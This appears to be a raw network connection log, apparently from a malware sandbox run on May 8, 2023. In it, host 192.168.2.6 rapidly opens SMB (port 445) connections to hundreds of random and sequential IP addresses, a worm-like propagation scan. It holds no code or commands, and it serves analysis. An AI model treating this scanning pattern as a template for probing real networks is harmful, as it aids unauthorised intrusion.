May 8, 2023 05:36:00.512763977 CEST	49989	445	192.168.2.6	9.72.100.239
May 8, 2023 05:36:00.512845993 CEST	49990	445	192.168.2.6	114.36.203.184
May 8, 2023 05:36:00.512975931 CEST	49991	445	192.168.2.6	86.131.233.189
May 8, 2023 05:36:00.513160944 CEST	49993	445	192.168.2.6	74.145.121.57
May 8, 2023 05:36:00.513180017 CEST	49992	445	192.168.2.6	216.136.138.185
May 8, 2023 05:36:00.513231039 CEST	49995	445	192.168.2.6	77.212.77.207
May 8, 2023 05:36:00.513494015 CEST	49994	445	192.168.2.6	177.223.187.162
May 8, 2023 05:36:00.723349094 CEST	445	49994	177.223.187.162	192.168.2.6
May 8, 2023 05:36:00.794898987 CEST	50000	445	192.168.2.6	194.241.201.216
May 8, 2023 05:36:01.010997057 CEST	50003	445	192.168.2.6	164.214.141.54
May 8, 2023 05:36:01.228771925 CEST	49994	445	192.168.2.6	177.223.187.162
May 8, 2023 05:36:01.275935888 CEST	50007	445	192.168.2.6	120.145.218.25
May 8, 2023 05:36:01.438823938 CEST	445	49994	177.223.187.162	192.168.2.6
May 8, 2023 05:36:01.448427916 CEST	50009	445	192.168.2.6	147.86.79.79
May 8, 2023 05:36:01.620549917 CEST	50012	445	192.168.2.6	190.15.252.14
May 8, 2023 05:36:01.621525049 CEST	50013	445	192.168.2.6	144.157.162.33
May 8, 2023 05:36:01.622443914 CEST	50014	445	192.168.2.6	44.139.28.118
May 8, 2023 05:36:01.623403072 CEST	50015	445	192.168.2.6	71.165.93.200
May 8, 2023 05:36:01.625212908 CEST	50017	445	192.168.2.6	112.160.13.9
May 8, 2023 05:36:01.625296116 CEST	50018	445	192.168.2.6	63.161.60.214
May 8, 2023 05:36:01.625614882 CEST	50019	445	192.168.2.6	94.42.250.179
May 8, 2023 05:36:01.911607981 CEST	50023	445	192.168.2.6	35.252.74.140
May 8, 2023 05:36:02.135420084 CEST	50025	445	192.168.2.6	201.232.96.7
May 8, 2023 05:36:02.386105061 CEST	50028	445	192.168.2.6	185.22.178.187
May 8, 2023 05:36:02.572899103 CEST	50031	445	192.168.2.6	161.53.135.126
May 8, 2023 05:36:02.760935068 CEST	50034	445	192.168.2.6	206.220.199.251
May 8, 2023 05:36:02.761471033 CEST	50035	445	192.168.2.6	196.155.75.33
May 8, 2023 05:36:02.761977911 CEST	50036	445	192.168.2.6	220.231.206.53
May 8, 2023 05:36:02.762528896 CEST	50037	445	192.168.2.6	18.74.4.85
May 8, 2023 05:36:02.763057947 CEST	50038	445	192.168.2.6	17.123.209.29
May 8, 2023 05:36:02.763647079 CEST	50039	445	192.168.2.6	142.49.230.133
May 8, 2023 05:36:02.764178991 CEST	50040	445	192.168.2.6	176.18.221.59
May 8, 2023 05:36:02.813500881 CEST	50042	445	192.168.2.6	62.237.48.69
May 8, 2023 05:36:03.026036978 CEST	50045	445	192.168.2.6	131.111.95.204
May 8, 2023 05:36:03.264143944 CEST	50047	445	192.168.2.6	202.102.30.46
May 8, 2023 05:36:03.510914087 CEST	50051	445	192.168.2.6	1.102.156.16
May 8, 2023 05:36:03.698156118 CEST	50055	445	192.168.2.6	124.15.141.177
May 8, 2023 05:36:03.873650074 CEST	50058	445	192.168.2.6	34.162.101.95
May 8, 2023 05:36:03.873754025 CEST	50060	445	192.168.2.6	10.166.142.67
May 8, 2023 05:36:03.873775005 CEST	50059	445	192.168.2.6	19.203.21.252
May 8, 2023 05:36:03.873800993 CEST	50061	445	192.168.2.6	27.20.143.172
May 8, 2023 05:36:03.873802900 CEST	50062	445	192.168.2.6	50.191.133.3
May 8, 2023 05:36:03.873897076 CEST	50063	445	192.168.2.6	111.194.116.199
May 8, 2023 05:36:03.873960972 CEST	50064	445	192.168.2.6	64.39.20.125
May 8, 2023 05:36:03.932898998 CEST	50066	445	192.168.2.6	54.96.143.8
May 8, 2023 05:36:04.151330948 CEST	50069	445	192.168.2.6	55.15.89.206
May 8, 2023 05:36:04.370249033 CEST	50070	445	192.168.2.6	95.143.28.78
May 8, 2023 05:36:04.620501995 CEST	50074	445	192.168.2.6	210.231.81.183
May 8, 2023 05:36:04.823122025 CEST	50077	445	192.168.2.6	189.193.14.5
May 8, 2023 05:36:04.823817968 CEST	50078	445	192.168.2.6	222.118.41.7
May 8, 2023 05:36:05.057504892 CEST	50082	445	192.168.2.6	40.176.129.193
May 8, 2023 05:36:05.073965073 CEST	50083	445	192.168.2.6	195.52.67.162
May 8, 2023 05:36:05.074219942 CEST	50084	445	192.168.2.6	38.151.121.252
May 8, 2023 05:36:05.074757099 CEST	50085	445	192.168.2.6	83.142.187.32
May 8, 2023 05:36:05.075516939 CEST	50086	445	192.168.2.6	200.201.157.75
May 8, 2023 05:36:05.076193094 CEST	50087	445	192.168.2.6	183.6.2.144
May 8, 2023 05:36:05.076618910 CEST	50088	445	192.168.2.6	97.181.227.96
May 8, 2023 05:36:05.077289104 CEST	50089	445	192.168.2.6	150.236.250.139
May 8, 2023 05:36:05.098870039 CEST	445	50083	195.52.67.162	192.168.2.6
May 8, 2023 05:36:05.261692047 CEST	50092	445	192.168.2.6	16.229.77.137
May 8, 2023 05:36:05.479840994 CEST	50095	445	192.168.2.6	144.152.141.183
May 8, 2023 05:36:05.604176998 CEST	50083	445	192.168.2.6	195.52.67.162
May 8, 2023 05:36:05.629000902 CEST	445	50083	195.52.67.162	192.168.2.6
May 8, 2023 05:36:05.745387077 CEST	50098	445	192.168.2.6	202.114.16.107
May 8, 2023 05:36:05.948584080 CEST	50101	445	192.168.2.6	66.206.113.187
May 8, 2023 05:36:05.948854923 CEST	50102	445	192.168.2.6	71.242.204.97
May 8, 2023 05:36:06.167949915 CEST	50106	445	192.168.2.6	212.155.53.113
May 8, 2023 05:36:06.183279037 CEST	50107	445	192.168.2.6	79.9.132.97
May 8, 2023 05:36:06.183806896 CEST	50108	445	192.168.2.6	207.66.32.57
May 8, 2023 05:36:06.183996916 CEST	50109	445	192.168.2.6	35.78.214.248
May 8, 2023 05:36:06.185286999 CEST	50110	445	192.168.2.6	105.72.199.1
May 8, 2023 05:36:06.186338902 CEST	50111	445	192.168.2.6	95.2.41.27
May 8, 2023 05:36:06.187311888 CEST	50112	445	192.168.2.6	113.142.41.157
May 8, 2023 05:36:06.188235998 CEST	50113	445	192.168.2.6	114.68.70.26
May 8, 2023 05:36:06.241244078 CEST	445	50107	79.9.132.97	192.168.2.6
May 8, 2023 05:36:06.370163918 CEST	50116	445	192.168.2.6	216.181.31.52
May 8, 2023 05:36:06.589050055 CEST	50119	445	192.168.2.6	94.28.24.189
May 8, 2023 05:36:06.745040894 CEST	50107	445	192.168.2.6	79.9.132.97
May 8, 2023 05:36:06.803087950 CEST	445	50107	79.9.132.97	192.168.2.6
May 8, 2023 05:36:06.854561090 CEST	50123	445	192.168.2.6	51.12.204.120
May 8, 2023 05:36:06.870989084 CEST	50124	445	192.168.2.6	53.18.226.109
May 8, 2023 05:36:07.073573112 CEST	50126	445	192.168.2.6	57.189.75.86
May 8, 2023 05:36:07.074146032 CEST	50127	445	192.168.2.6	144.17.168.227
May 8, 2023 05:36:07.295753956 CEST	50130	445	192.168.2.6	202.181.44.214
May 8, 2023 05:36:07.328908920 CEST	50131	445	192.168.2.6	167.117.39.26
May 8, 2023 05:36:07.328942060 CEST	50132	445	192.168.2.6	64.155.4.222
May 8, 2023 05:36:07.329093933 CEST	50133	445	192.168.2.6	205.3.154.99
May 8, 2023 05:36:07.329248905 CEST	50135	445	192.168.2.6	161.250.1.215
May 8, 2023 05:36:07.329282045 CEST	50136	445	192.168.2.6	5.9.151.17
May 8, 2023 05:36:07.329353094 CEST	50138	445	192.168.2.6	95.14.99.74
May 8, 2023 05:36:07.329581976 CEST	50134	445	192.168.2.6	98.22.235.141
May 8, 2023 05:36:07.351510048 CEST	445	50136	5.9.151.17	192.168.2.6
May 8, 2023 05:36:07.479697943 CEST	50141	445	192.168.2.6	153.97.243.115
May 8, 2023 05:36:07.715575933 CEST	50143	445	192.168.2.6	128.95.165.74
May 8, 2023 05:36:07.854330063 CEST	50136	445	192.168.2.6	5.9.151.17
May 8, 2023 05:36:07.876646996 CEST	445	50136	5.9.151.17	192.168.2.6
May 8, 2023 05:36:07.963941097 CEST	50144	445	192.168.2.6	43.193.177.56
May 8, 2023 05:36:07.995426893 CEST	50145	445	192.168.2.6	181.191.176.74
May 8, 2023 05:36:08.198405027 CEST	50147	445	192.168.2.6	102.131.16.141
May 8, 2023 05:36:08.198563099 CEST	50146	445	192.168.2.6	26.65.222.152
May 8, 2023 05:36:08.401561975 CEST	50148	445	192.168.2.6	97.18.115.130
May 8, 2023 05:36:08.449239016 CEST	50149	445	192.168.2.6	30.104.218.18
May 8, 2023 05:36:08.450016022 CEST	50150	445	192.168.2.6	158.192.134.152
May 8, 2023 05:36:08.451421976 CEST	50151	445	192.168.2.6	151.211.231.229
May 8, 2023 05:36:08.452316999 CEST	50152	445	192.168.2.6	188.162.170.48
May 8, 2023 05:36:08.454937935 CEST	50153	445	192.168.2.6	71.239.47.149
May 8, 2023 05:36:08.456006050 CEST	50154	445	192.168.2.6	110.78.6.39
May 8, 2023 05:36:08.456172943 CEST	50155	445	192.168.2.6	175.133.26.33
May 8, 2023 05:36:08.604903936 CEST	50156	445	192.168.2.6	130.233.250.250
May 8, 2023 05:36:08.838988066 CEST	50157	445	192.168.2.6	119.141.192.3
May 8, 2023 05:36:08.889045000 CEST	50158	445	192.168.2.6	209.231.178.174
May 8, 2023 05:36:09.089260101 CEST	50159	445	192.168.2.6	68.175.2.246
May 8, 2023 05:36:09.120621920 CEST	50160	445	192.168.2.6	187.21.88.36
May 8, 2023 05:36:09.308104038 CEST	50161	445	192.168.2.6	206.75.47.115
May 8, 2023 05:36:09.308442116 CEST	50162	445	192.168.2.6	74.174.48.82
May 8, 2023 05:36:09.511120081 CEST	50163	445	192.168.2.6	145.42.115.86
May 8, 2023 05:36:09.559361935 CEST	50164	445	192.168.2.6	197.253.6.232
May 8, 2023 05:36:09.560684919 CEST	50165	445	192.168.2.6	4.126.191.195
May 8, 2023 05:36:09.562247992 CEST	50166	445	192.168.2.6	75.52.69.218
May 8, 2023 05:36:09.563851118 CEST	50167	445	192.168.2.6	133.146.7.224
May 8, 2023 05:36:09.564624071 CEST	50168	445	192.168.2.6	90.152.216.152
May 8, 2023 05:36:09.566745043 CEST	50169	445	192.168.2.6	186.224.140.226
May 8, 2023 05:36:09.567370892 CEST	50170	445	192.168.2.6	8.56.53.10
May 8, 2023 05:36:09.729893923 CEST	50171	445	192.168.2.6	98.239.162.65
May 8, 2023 05:36:09.948704004 CEST	50172	445	192.168.2.6	37.203.145.162
May 8, 2023 05:36:09.996573925 CEST	50173	445	192.168.2.6	189.139.80.214
May 8, 2023 05:36:10.316286087 CEST	50174	445	192.168.2.6	157.1.173.100
May 8, 2023 05:36:10.316591024 CEST	50175	445	192.168.2.6	29.172.146.183
May 8, 2023 05:36:10.427726984 CEST	50176	445	192.168.2.6	60.186.138.103
May 8, 2023 05:36:10.427845955 CEST	50177	445	192.168.2.6	162.36.129.43
May 8, 2023 05:36:10.636301994 CEST	50178	445	192.168.2.6	40.136.214.176
May 8, 2023 05:36:10.668072939 CEST	50179	445	192.168.2.6	63.218.23.184
May 8, 2023 05:36:10.669183016 CEST	50180	445	192.168.2.6	88.193.98.157
May 8, 2023 05:36:10.670478106 CEST	50181	445	192.168.2.6	166.187.169.0
May 8, 2023 05:36:10.671531916 CEST	50182	445	192.168.2.6	212.176.154.24
May 8, 2023 05:36:10.672661066 CEST	50183	445	192.168.2.6	5.62.49.208
May 8, 2023 05:36:10.673892021 CEST	50184	445	192.168.2.6	151.178.86.246
May 8, 2023 05:36:10.675139904 CEST	50185	445	192.168.2.6	39.205.227.239
May 8, 2023 05:36:10.870491028 CEST	50186	445	192.168.2.6	77.187.149.208
May 8, 2023 05:36:10.909439087 CEST	50187	445	192.168.2.6	220.59.212.82
May 8, 2023 05:36:11.092600107 CEST	50188	445	192.168.2.6	202.198.224.45
May 8, 2023 05:36:11.120935917 CEST	50189	445	192.168.2.6	4.20.25.149
May 8, 2023 05:36:11.735240936 CEST	50191	445	192.168.2.6	217.158.213.163
May 8, 2023 05:36:11.735249996 CEST	50190	445	192.168.2.6	190.8.168.150
May 8, 2023 05:36:11.735349894 CEST	50192	445	192.168.2.6	158.71.84.63
May 8, 2023 05:36:11.735495090 CEST	50193	445	192.168.2.6	25.172.77.145
May 8, 2023 05:36:11.792951107 CEST	50194	445	192.168.2.6	112.118.131.39
May 8, 2023 05:36:11.884712934 CEST	50195	445	192.168.2.6	43.67.56.179
May 8, 2023 05:36:11.885183096 CEST	50196	445	192.168.2.6	169.49.10.120
May 8, 2023 05:36:11.885742903 CEST	50197	445	192.168.2.6	175.160.196.11
May 8, 2023 05:36:11.886363983 CEST	50198	445	192.168.2.6	41.149.102.206
May 8, 2023 05:36:11.886929989 CEST	50199	445	192.168.2.6	82.236.75.247
May 8, 2023 05:36:11.887523890 CEST	50200	445	192.168.2.6	152.156.210.135
May 8, 2023 05:36:11.888047934 CEST	50201	445	192.168.2.6	12.152.39.5
May 8, 2023 05:36:11.995754004 CEST	50202	445	192.168.2.6	218.191.228.17
May 8, 2023 05:36:12.012227058 CEST	50203	445	192.168.2.6	109.47.162.115
May 8, 2023 05:36:12.994720936 CEST	50204	445	192.168.2.6	207.193.60.158
May 8, 2023 05:36:12.994776011 CEST	50205	445	192.168.2.6	174.152.151.121
May 8, 2023 05:36:13.115508080 CEST	50206	445	192.168.2.6	199.142.242.153
May 8, 2023 05:36:13.115791082 CEST	50207	445	192.168.2.6	66.212.25.144
May 8, 2023 05:36:13.115844011 CEST	50208	445	192.168.2.6	32.214.66.223
May 8, 2023 05:36:13.115959883 CEST	50209	445	192.168.2.6	134.189.13.146
May 8, 2023 05:36:13.116069078 CEST	50210	445	192.168.2.6	8.34.134.240
May 8, 2023 05:36:13.179658890 CEST	50211	445	192.168.2.6	53.130.169.126
May 8, 2023 05:36:13.179757118 CEST	50212	445	192.168.2.6	111.31.34.127
May 8, 2023 05:36:13.179821968 CEST	50213	445	192.168.2.6	214.103.33.11
May 8, 2023 05:36:13.179899931 CEST	50214	445	192.168.2.6	35.27.146.142
May 8, 2023 05:36:13.179975986 CEST	50215	445	192.168.2.6	163.90.87.224
May 8, 2023 05:36:13.180052042 CEST	50216	445	192.168.2.6	11.46.113.188
May 8, 2023 05:36:13.180087090 CEST	50217	445	192.168.2.6	190.155.127.70
May 8, 2023 05:36:13.287992001 CEST	50218	445	192.168.2.6	124.4.241.210
May 8, 2023 05:36:13.288000107 CEST	50219	445	192.168.2.6	146.84.29.194
May 8, 2023 05:36:13.292965889 CEST	50220	445	192.168.2.6	167.129.208.118
May 8, 2023 05:36:14.105348110 CEST	50221	445	192.168.2.6	53.172.161.165
May 8, 2023 05:36:14.105556965 CEST	50222	445	192.168.2.6	170.243.190.57
May 8, 2023 05:36:14.214608908 CEST	50223	445	192.168.2.6	158.242.82.138
May 8, 2023 05:36:14.214739084 CEST	50224	445	192.168.2.6	107.165.99.241
May 8, 2023 05:36:14.214912891 CEST	50225	445	192.168.2.6	144.162.181.200
May 8, 2023 05:36:14.215015888 CEST	50226	445	192.168.2.6	187.54.35.1
May 8, 2023 05:36:14.215090036 CEST	50227	445	192.168.2.6	93.78.152.228
May 8, 2023 05:36:14.309524059 CEST	50228	445	192.168.2.6	27.205.208.111
May 8, 2023 05:36:14.311451912 CEST	50229	445	192.168.2.6	184.114.212.156
May 8, 2023 05:36:14.312638044 CEST	50230	445	192.168.2.6	131.72.202.205
May 8, 2023 05:36:14.315653086 CEST	50231	445	192.168.2.6	62.220.120.91
May 8, 2023 05:36:14.315871000 CEST	50232	445	192.168.2.6	31.142.99.60
May 8, 2023 05:36:14.316288948 CEST	50234	445	192.168.2.6	4.158.171.75
May 8, 2023 05:36:14.316346884 CEST	50233	445	192.168.2.6	97.239.200.5
May 8, 2023 05:36:14.385360003 CEST	445	50224	107.165.99.241	192.168.2.6
May 8, 2023 05:36:14.385514975 CEST	50224	445	192.168.2.6	107.165.99.241
May 8, 2023 05:36:14.385628939 CEST	50224	445	192.168.2.6	107.165.99.241
May 8, 2023 05:36:14.385868073 CEST	50235	445	192.168.2.6	107.165.99.1
May 8, 2023 05:36:14.402239084 CEST	50236	445	192.168.2.6	142.117.89.249
May 8, 2023 05:36:14.402537107 CEST	50237	445	192.168.2.6	181.229.224.146
May 8, 2023 05:36:14.402698994 CEST	50238	445	192.168.2.6	144.94.172.142
May 8, 2023 05:36:14.555928946 CEST	445	50224	107.165.99.241	192.168.2.6
May 8, 2023 05:36:14.555985928 CEST	445	50224	107.165.99.241	192.168.2.6
May 8, 2023 05:36:15.190970898 CEST	50239	445	192.168.2.6	15.193.97.223
May 8, 2023 05:36:15.230544090 CEST	50240	445	192.168.2.6	182.230.107.222
May 8, 2023 05:36:15.230695963 CEST	50241	445	192.168.2.6	156.119.81.46
May 8, 2023 05:36:15.325316906 CEST	50242	445	192.168.2.6	115.103.19.167
May 8, 2023 05:36:15.325378895 CEST	50243	445	192.168.2.6	92.191.121.112
May 8, 2023 05:36:15.325544119 CEST	50244	445	192.168.2.6	26.43.201.106
May 8, 2023 05:36:15.325572968 CEST	50245	445	192.168.2.6	181.57.207.102
May 8, 2023 05:36:15.408966064 CEST	49695	80	192.168.2.6	192.229.221.95
May 8, 2023 05:36:15.434895039 CEST	50247	445	192.168.2.6	98.170.171.66
May 8, 2023 05:36:15.434900045 CEST	50246	445	192.168.2.6	51.90.197.146
May 8, 2023 05:36:15.435425043 CEST	50248	445	192.168.2.6	140.246.32.98
May 8, 2023 05:36:15.436026096 CEST	50249	445	192.168.2.6	198.60.72.249
May 8, 2023 05:36:15.436373949 CEST	50250	445	192.168.2.6	80.208.115.40
May 8, 2023 05:36:15.436826944 CEST	50251	445	192.168.2.6	81.152.157.230
May 8, 2023 05:36:15.437355042 CEST	50252	445	192.168.2.6	26.181.106.85
May 8, 2023 05:36:15.448949099 CEST	50253	445	192.168.2.6	107.165.99.2
May 8, 2023 05:36:15.512502909 CEST	50254	445	192.168.2.6	29.13.195.60
May 8, 2023 05:36:15.512823105 CEST	50255	445	192.168.2.6	190.248.84.162
May 8, 2023 05:36:15.513139963 CEST	50256	445	192.168.2.6	152.16.87.102
May 8, 2023 05:36:15.836143017 CEST	80	49695	192.229.221.95	192.168.2.6
May 8, 2023 05:36:15.840349913 CEST	49695	80	192.168.2.6	192.229.221.95
May 8, 2023 05:36:16.293133974 CEST	50257	445	192.168.2.6	111.223.173.114
May 8, 2023 05:36:16.340131044 CEST	50258	445	192.168.2.6	169.161.7.121
May 8, 2023 05:36:16.340254068 CEST	50259	445	192.168.2.6	27.183.176.38
May 8, 2023 05:36:16.449873924 CEST	50260	445	192.168.2.6	20.222.147.231
May 8, 2023 05:36:16.449873924 CEST	50261	445	192.168.2.6	83.88.215.251
May 8, 2023 05:36:16.450177908 CEST	50262	445	192.168.2.6	156.20.111.71
May 8, 2023 05:36:16.450428963 CEST	50263	445	192.168.2.6	48.186.253.208
May 8, 2023 05:36:16.511806965 CEST	50264	445	192.168.2.6	107.165.99.3
May 8, 2023 05:36:16.560441017 CEST	50266	445	192.168.2.6	123.236.75.136
May 8, 2023 05:36:16.560549021 CEST	50267	445	192.168.2.6	81.46.62.17
May 8, 2023 05:36:16.560549021 CEST	50268	445	192.168.2.6	75.86.137.64
May 8, 2023 05:36:16.560549974 CEST	50265	445	192.168.2.6	76.17.159.89
May 8, 2023 05:36:16.560602903 CEST	50269	445	192.168.2.6	23.141.3.38
May 8, 2023 05:36:16.560834885 CEST	50270	445	192.168.2.6	58.14.27.33
May 8, 2023 05:36:16.574368954 CEST	50271	445	192.168.2.6	122.63.237.99
May 8, 2023 05:36:16.636735916 CEST	50272	445	192.168.2.6	142.141.25.243
May 8, 2023 05:36:16.636858940 CEST	50273	445	192.168.2.6	48.93.172.213
May 8, 2023 05:36:16.637087107 CEST	50274	445	192.168.2.6	223.119.214.143
May 8, 2023 05:36:17.200423956 CEST	50275	445	192.168.2.6	50.96.73.180
May 8, 2023 05:36:17.418056011 CEST	50276	445	192.168.2.6	107.73.58.38
May 8, 2023 05:36:17.450512886 CEST	50277	445	192.168.2.6	89.79.108.123
May 8, 2023 05:36:17.450978041 CEST	50278	445	192.168.2.6	64.68.9.201
May 8, 2023 05:36:17.558640957 CEST	50279	445	192.168.2.6	192.87.173.251
May 8, 2023 05:36:17.558743000 CEST	50280	445	192.168.2.6	9.56.137.203
May 8, 2023 05:36:17.558969975 CEST	50282	445	192.168.2.6	87.113.116.100
May 8, 2023 05:36:17.558998108 CEST	50281	445	192.168.2.6	101.89.201.221
May 8, 2023 05:36:17.590148926 CEST	50283	445	192.168.2.6	107.165.99.4
May 8, 2023 05:36:17.686801910 CEST	50284	445	192.168.2.6	154.171.71.191
May 8, 2023 05:36:17.696616888 CEST	50285	445	192.168.2.6	104.58.223.146
May 8, 2023 05:36:17.696727037 CEST	50286	445	192.168.2.6	106.198.2.89
May 8, 2023 05:36:17.696906090 CEST	50289	445	192.168.2.6	38.4.6.77
May 8, 2023 05:36:17.696916103 CEST	50288	445	192.168.2.6	23.182.205.164
May 8, 2023 05:36:17.697036982 CEST	50290	445	192.168.2.6	95.27.234.199
May 8, 2023 05:36:17.708782911 CEST	50287	445	192.168.2.6	82.254.251.15
May 8, 2023 05:36:17.762250900 CEST	50291	445	192.168.2.6	103.201.126.244
May 8, 2023 05:36:17.762398958 CEST	50292	445	192.168.2.6	97.59.24.117
May 8, 2023 05:36:17.762418985 CEST	50293	445	192.168.2.6	116.54.145.167
May 8, 2023 05:36:17.852108955 CEST	80	49695	192.229.221.95	192.168.2.6
May 8, 2023 05:36:17.852225065 CEST	49695	80	192.168.2.6	192.229.221.95
May 8, 2023 05:36:18.324223995 CEST	50294	445	192.168.2.6	223.16.96.150
May 8, 2023 05:36:18.527786016 CEST	50295	445	192.168.2.6	108.246.244.191
May 8, 2023 05:36:18.574759960 CEST	50296	445	192.168.2.6	136.235.7.210
May 8, 2023 05:36:18.574950933 CEST	50297	445	192.168.2.6	178.168.183.200
May 8, 2023 05:36:18.668025017 CEST	50298	445	192.168.2.6	107.165.99.5
May 8, 2023 05:36:18.685883999 CEST	50300	445	192.168.2.6	170.221.211.221
May 8, 2023 05:36:18.685884953 CEST	50299	445	192.168.2.6	116.205.60.175
May 8, 2023 05:36:18.686054945 CEST	50301	445	192.168.2.6	47.134.44.64
May 8, 2023 05:36:18.686284065 CEST	50302	445	192.168.2.6	100.150.236.25
May 8, 2023 05:36:18.805085897 CEST	80	49702	209.197.3.8	192.168.2.6
May 8, 2023 05:36:18.805210114 CEST	49702	80	192.168.2.6	209.197.3.8
May 8, 2023 05:36:18.825309038 CEST	50303	445	192.168.2.6	218.14.239.162
May 8, 2023 05:36:18.825915098 CEST	50304	445	192.168.2.6	22.124.129.172
May 8, 2023 05:36:18.826527119 CEST	50305	445	192.168.2.6	201.18.14.144
May 8, 2023 05:36:18.827279091 CEST	50306	445	192.168.2.6	31.104.22.17
May 8, 2023 05:36:18.827987909 CEST	50307	445	192.168.2.6	120.70.50.173
May 8, 2023 05:36:18.828655005 CEST	50308	445	192.168.2.6	17.252.124.82
May 8, 2023 05:36:18.829387903 CEST	50309	445	192.168.2.6	188.30.65.83
May 8, 2023 05:36:18.886873007 CEST	50310	445	192.168.2.6	125.245.252.79
May 8, 2023 05:36:18.886989117 CEST	50311	445	192.168.2.6	104.29.244.128
May 8, 2023 05:36:18.887100935 CEST	50312	445	192.168.2.6	23.44.187.55
May 8, 2023 05:36:19.215256929 CEST	50313	445	192.168.2.6	181.136.40.224
May 8, 2023 05:36:19.449788094 CEST	50314	445	192.168.2.6	159.143.58.187
May 8, 2023 05:36:19.636845112 CEST	50315	445	192.168.2.6	167.76.32.214
May 8, 2023 05:36:19.684746981 CEST	50316	445	192.168.2.6	28.70.133.239
May 8, 2023 05:36:19.685337067 CEST	50317	445	192.168.2.6	215.18.147.149
May 8, 2023 05:36:19.738737106 CEST	50318	445	192.168.2.6	107.165.99.6
May 8, 2023 05:36:19.793195009 CEST	50319	445	192.168.2.6	122.207.227.232
May 8, 2023 05:36:19.793284893 CEST	50320	445	192.168.2.6	21.32.220.199
May 8, 2023 05:36:19.793445110 CEST	50321	445	192.168.2.6	92.119.92.187
May 8, 2023 05:36:19.793553114 CEST	50322	445	192.168.2.6	144.133.138.40
May 8, 2023 05:36:19.868145943 CEST	80	49695	192.229.221.95	192.168.2.6
May 8, 2023 05:36:19.871099949 CEST	49695	80	192.168.2.6	192.229.221.95
May 8, 2023 05:36:19.951226950 CEST	50324	445	192.168.2.6	109.53.162.234
May 8, 2023 05:36:19.951232910 CEST	50325	445	192.168.2.6	194.209.53.196
May 8, 2023 05:36:19.951241016 CEST	50323	445	192.168.2.6	86.80.71.4
May 8, 2023 05:36:19.951253891 CEST	50326	445	192.168.2.6	92.66.219.156
May 8, 2023 05:36:19.951327085 CEST	50328	445	192.168.2.6	170.168.186.128
May 8, 2023 05:36:19.951334000 CEST	50327	445	192.168.2.6	31.40.199.169
May 8, 2023 05:36:19.951426029 CEST	50329	445	192.168.2.6	102.10.198.210
May 8, 2023 05:36:19.987381935 CEST	445	50327	31.40.199.169	192.168.2.6
May 8, 2023 05:36:19.997332096 CEST	50330	445	192.168.2.6	141.63.169.93
May 8, 2023 05:36:19.997744083 CEST	50331	445	192.168.2.6	40.57.110.235
May 8, 2023 05:36:19.998042107 CEST	50332	445	192.168.2.6	93.183.204.75
May 8, 2023 05:36:20.324661970 CEST	50333	445	192.168.2.6	118.100.36.90
May 8, 2023 05:36:20.496130943 CEST	50327	445	192.168.2.6	31.40.199.169
May 8, 2023 05:36:20.532032967 CEST	445	50327	31.40.199.169	192.168.2.6
May 8, 2023 05:36:20.574688911 CEST	50334	445	192.168.2.6	9.33.107.248
May 8, 2023 05:36:20.746589899 CEST	50335	445	192.168.2.6	148.98.65.243
May 8, 2023 05:36:20.793832064 CEST	50336	445	192.168.2.6	107.165.99.7
May 8, 2023 05:36:20.809334993 CEST	50337	445	192.168.2.6	162.137.67.60
May 8, 2023 05:36:20.809335947 CEST	50338	445	192.168.2.6	121.205.200.42
May 8, 2023 05:36:20.902968884 CEST	50339	445	192.168.2.6	126.66.175.112
May 8, 2023 05:36:20.902985096 CEST	50340	445	192.168.2.6	214.246.170.248
May 8, 2023 05:36:20.903085947 CEST	50341	445	192.168.2.6	48.41.108.136
May 8, 2023 05:36:20.903321028 CEST	50342	445	192.168.2.6	53.53.101.150
May 8, 2023 05:36:21.105870962 CEST	50343	445	192.168.2.6	82.66.19.43
May 8, 2023 05:36:21.106015921 CEST	50344	445	192.168.2.6	221.154.233.187
May 8, 2023 05:36:21.106451988 CEST	50345	445	192.168.2.6	2.188.65.75
May 8, 2023 05:36:21.122209072 CEST	50346	445	192.168.2.6	154.81.38.61
May 8, 2023 05:36:21.122684002 CEST	50347	445	192.168.2.6	133.200.82.147
May 8, 2023 05:36:21.123337984 CEST	50348	445	192.168.2.6	80.188.153.168
May 8, 2023 05:36:21.124005079 CEST	50349	445	192.168.2.6	37.202.61.170
May 8, 2023 05:36:21.124665022 CEST	50350	445	192.168.2.6	119.149.247.12
May 8, 2023 05:36:21.125235081 CEST	50351	445	192.168.2.6	161.204.16.215
May 8, 2023 05:36:21.125889063 CEST	50352	445	192.168.2.6	21.20.101.152
May 8, 2023 05:36:21.165210962 CEST	445	50349	37.202.61.170	192.168.2.6
May 8, 2023 05:36:21.231923103 CEST	50353	445	192.168.2.6	30.227.113.42
May 8, 2023 05:36:21.434084892 CEST	50354	445	192.168.2.6	45.8.181.70
May 8, 2023 05:36:21.668036938 CEST	50349	445	192.168.2.6	37.202.61.170
May 8, 2023 05:36:21.699522018 CEST	50355	445	192.168.2.6	202.19.186.125
May 8, 2023 05:36:21.709208965 CEST	445	50349	37.202.61.170	192.168.2.6
May 8, 2023 05:36:21.871493101 CEST	50356	445	192.168.2.6	216.44.208.233
May 8, 2023 05:36:21.871661901 CEST	50357	445	192.168.2.6	107.165.99.8
May 8, 2023 05:36:21.885543108 CEST	80	49695	192.229.221.95	192.168.2.6
May 8, 2023 05:36:21.885679007 CEST	49695	80	192.168.2.6	192.229.221.95
May 8, 2023 05:36:21.925084114 CEST	50359	445	192.168.2.6	145.36.57.11
May 8, 2023 05:36:21.925086021 CEST	50358	445	192.168.2.6	2.110.160.195
May 8, 2023 05:36:22.012806892 CEST	50360	445	192.168.2.6	181.126.146.106
May 8, 2023 05:36:22.012972116 CEST	50361	445	192.168.2.6	199.141.152.161
May 8, 2023 05:36:22.013788939 CEST	50362	445	192.168.2.6	17.17.176.6
May 8, 2023 05:36:22.014864922 CEST	50363	445	192.168.2.6	54.201.23.152
May 8, 2023 05:36:22.239274025 CEST	50364	445	192.168.2.6	87.48.160.6
May 8, 2023 05:36:22.239531040 CEST	50365	445	192.168.2.6	192.46.168.200
May 8, 2023 05:36:22.239835024 CEST	50366	445	192.168.2.6	50.205.76.115
May 8, 2023 05:36:22.262454033 CEST	50367	445	192.168.2.6	77.68.39.137
May 8, 2023 05:36:22.262885094 CEST	50368	445	192.168.2.6	203.238.248.212
May 8, 2023 05:36:22.263448000 CEST	50369	445	192.168.2.6	105.227.246.12
May 8, 2023 05:36:22.263909101 CEST	50370	445	192.168.2.6	98.22.202.132
May 8, 2023 05:36:22.264421940 CEST	50371	445	192.168.2.6	61.9.54.216
May 8, 2023 05:36:22.265281916 CEST	50373	445	192.168.2.6	95.133.138.218
May 8, 2023 05:36:22.355789900 CEST	50374	445	192.168.2.6	35.151.114.93
